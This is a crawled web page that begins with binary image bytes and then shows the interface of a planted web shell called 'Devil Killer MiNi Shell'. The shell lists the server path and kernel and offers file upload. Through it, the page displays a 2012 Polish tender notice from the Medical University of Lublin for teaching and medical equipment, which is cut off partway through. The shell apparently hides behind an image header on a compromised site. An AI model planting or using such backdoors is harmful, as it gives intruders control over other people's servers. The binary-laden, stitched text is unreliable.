JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120730/165181-N-2012.html

<p class="kh_header"><b>Lublin: Dostawa medycznego wyposażenia niezbędnego do poprawy dostępu do bazy dydaktycznej oraz dostawa urządzeń audiowizualnych ujętych w projekcie pn.: Poprawa dostępu do bazy dydaktycznej na Wydziale Pielęgniarstwa i Nauk o Zdrowiu Uniwersytetu Medycznego w Lublinie; UM-ZP-262-55/12</b><br>
<b>Numer ogłoszenia: 165181 - 2012; data zamieszczenia: 30.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Medyczny w Lublinie , Al. Racławickie 1, 20-059 Lublin, woj. lubelskie, tel. 81 528 88 88, faks 81 528 89 18.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.am.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa medycznego wyposażenia niezbędnego do poprawy dostępu do bazy dydaktycznej oraz dostawa urządzeń audiowizualnych ujętych w projekcie pn.: Poprawa dostępu do bazy dydaktycznej na Wydziale Pielęgniarstwa i Nauk o Zdrowiu Uniwersytetu Medycznego w Lublinie; UM-ZP-262-55/12.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa medycznego wyposażenia niezbędnego do poprawy dostępu do bazy dydaktycznej oraz dostawa urządzeń audiowizualnych ujętych w projekcie pn.: Poprawa dostępu do bazy dydaktycznej na Wydziale Pielęgniarstwa i Nauk o Zdrowiu Uniwersytetu Medycznego w Lublinie określonych w siedmiu zadaniach (ofertach częściowych) następująco:
Zadanie 1 - Dostawa i montaż stanowiska do higienicznego i chirurgicznego mycia rąk
Zadanie 2 - Dostawa i montaż stanowiska do pielęgnacji noworodka  
Zadanie 3 - Wyposażenie meblowe pracowni dydaktycznych (łóżka szpitale, szafki 
                    przyłóżkowe, parawany, taborety, szafy medyczne, stoliki medyczne)
Zadanie 4 - Fotel ginekologiczny i łóżko porodowe
Zadanie 5 - Sprzęt rehabilitacyjny (materace, piłki, drabinki)
Zadanie 6 - Dostawa urządzeń audiowizualnych
Zadanie 7 - Drobny sprzęt medyczny
2.	Oferowany przez Wykonawców przedmiot zamówienia musi spełniać wymagane graniczne parametry techniczne i użytkowe zawarte w Zestawieniach wymaganych parametrów technicznych i funkcjonalnych stanowiących :
załącznik nr 7a dla Zadania 1, 
załącznik nr 7b dla Zadania 2, 
załącznik nr 7c dla Zadania 3, 
załącznik nr 7d dla Zadania 4, 
załącznik nr 7e dla Zadania 5, 
załącznik nr 7f  dla Zadania 6,
załącznik nr 7g dla Zadania 7   
do niniejszej SIWZ.
3.	Wspólny Słownik Zamówień (CPV): 
1)	33000000-0 Urządzenia medyczne, farmaceutyki i produkty do pielęgnacji ciała
2)	33100000-1 Urządzenia medyczne
3)	33140000-3 Materiały medyczne
4)	33190000-8 Różne urządzenia i produkty medyczne
5)	33192300-5 Meble medyczne, z wyjątkiem łóżek i stołów
6)	33192100-3 Łóżka do użytku medycznego
7)	33192120-9 Łóżka szpitalne
8)	33192000-2 Meble medyczne
9)	38412000-6 Termometry
10)	39143112-4 Materace
11)	39143116-2 Łóżeczka
12)	37420000-8 Sprzęt gimnastyczny	
13)	37423300-2 Gimnastyczne akcesoria do wspinania 
14)	37421000-5 Maty gimnastyczne
15)	38423100-7 Ciśnieniomierze
16)	38652100-1 Projektory
17)	38653400-1 Ekrany projekcyjne
18)	30195800-0 Chwyty do zwieszenia
19)	32324600-6 Telewizory
20)	33167000-8 lampy chirurgiczne
21)	31521000-4 Lampy
22)	38423000-6 Urządzenia  do pomiaru ciśnienia
23)	42923110-6 Wagi
Informacje dodatkowe
1.	Zamawiający wymaga zaoferowania przedmiotu zamówienia fabrycznie nowego, nieuszkodzonego, nieregenerowanego, nie będącego uprzednio przedmiotem ekspozycji i wystaw, kompletnego i gotowego do użycia (tj. bez żadnych zbędnych i dodatkowych inwestycji), nieobciążonego prawami osób lub podmiotów trzecich.
2.	Montaż obejmuje: dostarczenie do miejsca instalacji, rozpakowanie, zainstalowanie, sprawdzenie, przeprowadzenie wymaganych prób i pomiarów, uruchomienie, przeszkolenie pracowników odbiorcy i przekazanie urządzeń do użytku..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0, 33.10.00.00-1, 33.14.00.00-3, 33.19.00.00-8, 38.42.30.00-6, 42.92.31.10-6, 38.41.20.00-6, 39.14.31.12-4, 39.14.31.16-2, 37.42.00.00-8, 37.42.33.00-2, 37.42.10.00-5, 38.42.31.00-7, 38.65.21.00-1, 38.65.34.00-1, 30.19.58.00-0, 32.32.46.00-6, 33.16.70.00-8, 31.52.10.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od Wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3.	Jako spełniający warunki udziału w postępowaniu, o których mowa w punkcie 1 ppkt. 1÷4 zostaną ocenieni Wykonawcy, którzy oprócz oświadczenia, że spełniają warunki udziału, o których mowa 
w art. 22 ust. 1 Pzp: 
3.1. 	w zakresie warunku określonego w punkcie 1 ppkt. 1.2. - wykażą się należytym wykonaniem
co najmniej jednej dostawy sprzętu medycznego i/lub wyposażenia medycznego i/lub aparatury medycznej o wartości brutto :
w Zadaniu 1 - minimum 8.000,00 zł (słownie: osiem tysięcy złotych)  
w Zadaniu 2 - minimum 15.000,00 zł (słownie: piętnaście tysięcy złotych) 
w Zadaniu 3 - minimum 80 000,00 zł (słownie: osiemdziesiąt tysięcy złotych) 
w Zadaniu 4 - minimum 30 000,00 zł (słownie: trzydzieści tysięcy złotych) 
w Zadaniu 5 - minimum 7 000,00 zł (słownie: siedem tysięcy złotych) 
w Zadaniu 7 - minimum 15 000,00 zł (słownie: piętnaście tysięcy złotych) 
3.2. 	w zakresie warunku określonego w punkcie 1 ppkt. 1.2. - wykażą się należytym wykonaniem
co najmniej jednej dostawy urządzeń audiowizualnych o wartości brutto :
w Zadaniu 6 - minimum 70 000,00 zł (słownie: siedemdziesiąt tysięcy złotych) 
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. 
Przez wartość dostawy Zamawiający rozumie łączną wartość dostarczonych produktów 
w ramach jednej umowy. Przez jedną dostawę Zamawiający rozumie sumę dostaw w ramach jednej umowy.
Oświadczenie Wykonawcy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>6.	W przypadku wątpliwości, co do treści dokumentu złożonego przez Wykonawcę mającego siedzibę 
lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Zamawiający może zwrócić się do właściwych organów odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca 
ma siedzibę lub miejsce zamieszkania z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.
7.	Jeżeli Wykonawca, polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych 
do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, to zobowiązany 
jest również przedłożyć:
7.1	Pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów 
na okres korzystania z nich przy wykonywaniu zamówienia;
7.2	Oświadczenie i dokumenty dotyczące tych podmiotów, wymienione punkcie 3, w przypadku, gdy podmioty te będą brały udział w realizacji części zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana postanowień niniejszej Umowy może nastąpić w formie pisemnego aneksu pod rygorem nieważności, w następujących sytuacjach:
1.1.	braku pełnej gotowości pomieszczeń przeznaczanych do montażu przedmiotu umowy;
1.2.	aktualizacji rozwiązań ze względu na postęp techniczny lub technologiczny (np. wycofanie 
z obrotu urządzeń lub materiałów), zmiana nie może spowodować zmiany ceny oraz obniżenia parametrów technicznych, jakościowych i innych wynikających z oferty, 
na podstawie których był dokonany wybór Wykonawcy;
1.3.	konieczności zmiany terminu realizacji przedmiotu umowy z przyczyn niezawinionych 
przez Strony, zmiana nie może spowodować zmiany ceny wynikającej z oferty Wykonawcy;
1.4.	zmiany obowiązujących przepisów, jeżeli konieczne będzie dostosowanie treści umowy 
do aktualnego stanu prawnego;
1.5.	zmiany stawki podatku od towarów i usług; wartość umowy określona w §5 ust. 1 umowy ulegnie zmniejszeniu w przypadku obniżenia stawki podatku od towarów i usług 
lub powiększeniu w przypadku podwyższenia stawki podatku od towarów i usług;
1.6.	konieczności zmiany osób wskazanych do realizacji umowy;
1.7.	zaistnienia okoliczności (technicznych, gospodarczych, itp.) których nie można było przewidzieć w chwili zawarcia umowy;
1.8.	wystąpienia zdarzeń siły wyższej jako zdarzenia zewnętrznego, niemożliwego 
do przewidzenia i niemożliwego do zapobieżenia;
1.9.	wprowadzenia nowej technologii, lub innych okoliczności pozwalających na obniżenie ceny przedmiotu umowy, Wykonawca może ją odpowiednio obniżyć;
1.10.	wprowadzenia nowej technologii produktu objętego przedmiotową umową, wówczas Zamawiający dopuszcza jego zastąpienie jedynie produktem równoważnym lub 
o wyższych parametrach jakościowych, o cenie nie wyższej niż w umowie. 
Inicjatorem zmian może być Zamawiający lub Wykonawca poprzez pisemne wystąpienie 
w okresie obowiązywania umowy zawierające uzasadnienie proponowanych zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umlub.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 1) strona internetowa j.w 2) Osoby: Agnieszka Czajka e-mail: agnieszka.czajka@umlub.pl tel.: (81) 528-89-67, faks: (81) 528-89-54.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.08.2012 godzina 11:45, miejsce: Kancelaria Ogólna Uniwersytetu Medycznego w Lublinie, Al. Racławickie 1, 20-059 Lublin, pok. 22.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie dotyczy projektu finansowanego ze środków Unii Europejskiej pn: Poprawa dostępu do bazy dydaktycznej na Wydziale Pielęgniarstwa i Nauk o Zdrowiu Uniwersytetu Medycznego w Lublinie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa medycznego wyposażenia niezbędnego do poprawy dostępu do bazy dydaktycznej oraz dostawa urządzeń audiowizualnych ujętych w projekcie pn.: Poprawa dostępu do bazy dydaktycznej na Wydziale Pielęgniarstwa i Nauk o Zdrowiu Uniwersytetu Medycznego w Lublinie określonych  następująco:
Zadanie 1 - Dostawa i montaż stanowiska do higienicznego i chirurgicznego mycia rąk
2.	Oferowany przez Wykonawców przedmiot zamówienia musi spełniać wymagane graniczne parametry techniczne i użytkowe zawarte w Zestawieniach wymaganych parametrów technicznych i funkcjonalnych stanowiących :
załącznik nr 7a dla Zadania 1,
3.	Wspólny Słownik Zamówień (CPV): 
1)	33000000-0 Urządzenia medyczne, farmaceutyki i produkty do pielęgnacji ciała
2)	33100000-1 Urządzenia medyczne
3)	33140000-3 Materiały medyczne
4)	33190000-8 Różne urządzenia i produkty medyczne
5)	33192300-5 Meble medyczne, z wyjątkiem łóżek i stołów
6)	33192100-3 Łóżka do użytku medycznego
7)	33192120-9 Łóżka szpitalne
8)	33192000-2 Meble medyczne
9)	38412000-6 Termometry
10)	39143112-4 Materace
11)	39143116-2 Łóżeczka
12)	37420000-8 Sprzęt gimnastyczny	
13)	37423300-2 Gimnastyczne akcesoria do wspinania 
14)	37421000-5 Maty gimnastyczne
15)	38423100-7 Ciśnieniomierze
16)	38652100-1 Projektory
17)	38653400-1 Ekrany projekcyjne
18)	30195800-0 Chwyty do zwieszenia
19)	32324600-6 Telewizory
20)	33167000-8 lampy chirurgiczne
21)	31521000-4 Lampy
22)	38423000-6 Urządzenia  do pomiaru ciśnienia
23)	42923110-6 Wagi
Informacje dodatkowe
1.	Zamawiający wymaga zaoferowania przedmiotu zamówienia fabrycznie nowego, nieuszkodzonego, nieregenerowanego, nie będącego uprzednio przedmiotem ekspozycji i wystaw, kompletnego i gotowego do użycia (tj. bez żadnych zbędnych i dodatkowych inwestycji), nieobciążonego prawami osób lub podmiotów trzecich.
2.	Montaż obejmuje: dostarczenie do miejsca instalacji, rozpakowanie, zainstalowanie, sprawdzenie, przeprowadzenie wymaganych prób i pomiarów, uruchomienie, przeszkolenie pracowników odbiorcy i przekazanie urządzeń do użytku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa medycznego wyposażenia niezbędnego do poprawy dostępu do bazy dydaktycznej oraz dostawa urządzeń audiowizualnych ujętych w projekcie pn.: Poprawa dostępu do bazy dydaktycznej na Wydziale Pielęgniarstwa i Nauk o Zdrowiu Uniwersytetu Medycznego w Lublinie określonych  następująco:
Zadanie 2 - Dostawa i montaż stanowiska do pielęgnacji noworodka
2.	Oferowany przez Wykonawców przedmiot zamówienia musi spełniać wymagane graniczne parametry techniczne i użytkowe zawarte w Zestawieniach wymaganych parametrów technicznych i funkcjonalnych stanowiących :
załącznik nr 7b dla Zadania 2
3.	Wspólny Słownik Zamówień (CPV): 
1)	33000000-0 Urządzenia medyczne, farmaceutyki i produkty do pielęgnacji ciała
2)	33100000-1 Urządzenia medyczne
3)	33140000-3 Materiały medyczne
4)	33190000-8 Różne urządzenia i produkty medyczne
5)	33192300-5 Meble medyczne, z wyjątkiem łóżek i stołów
6)	33192100-3 Łóżka do użytku medycznego
7)	33192120-9 Łóżka szpitalne
8)	33192000-2 Meble medyczne
9)	38412000-6 Termometry
10)	39143112-4 Materace
11)	39143116-2 Łóżeczka
12)	37420000-8 Sprzęt gimnastyczny	
13)	37423300-2 Gimnastyczne akcesoria do wspinania 
14)	37421000-5 Maty gimnastyczne
15)	38423100-7 Ciśnieniomierze
16)	38652100-1 Projektory
17)	38653400-1 Ekrany projekcyjne
18)	30195800-0 Chwyty do zwieszenia
19)	32324600-6 Telewizory
20)	33167000-8 lampy chirurgiczne
21)	31521000-4 Lampy
22)	38423000-6 Urządzenia  do pomiaru ciśnienia
23)	42923110-6 Wagi
Informacje dodatkowe
1.	Zamawiający wymaga zaoferowania przedmiotu zamówienia fabrycznie nowego, nieuszkodzonego, nieregenerowanego, nie będącego uprzednio przedmiotem ekspozycji i wystaw, kompletnego i gotowego do użycia (tj. bez żadnych zbędnych i dodatkowych inwestycji), nieobciążonego prawami osób lub podmiotów trzecich.
2.	Montaż obejmuje: dostarczenie do miejsca instalacji, rozpakowanie, zainstalowanie, sprawdzenie, przeprowadzenie wymaganych prób i pomiarów, uruchomienie, przeszkolenie pracowników odbiorcy i przekazanie urządzeń do użytku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3.</p>
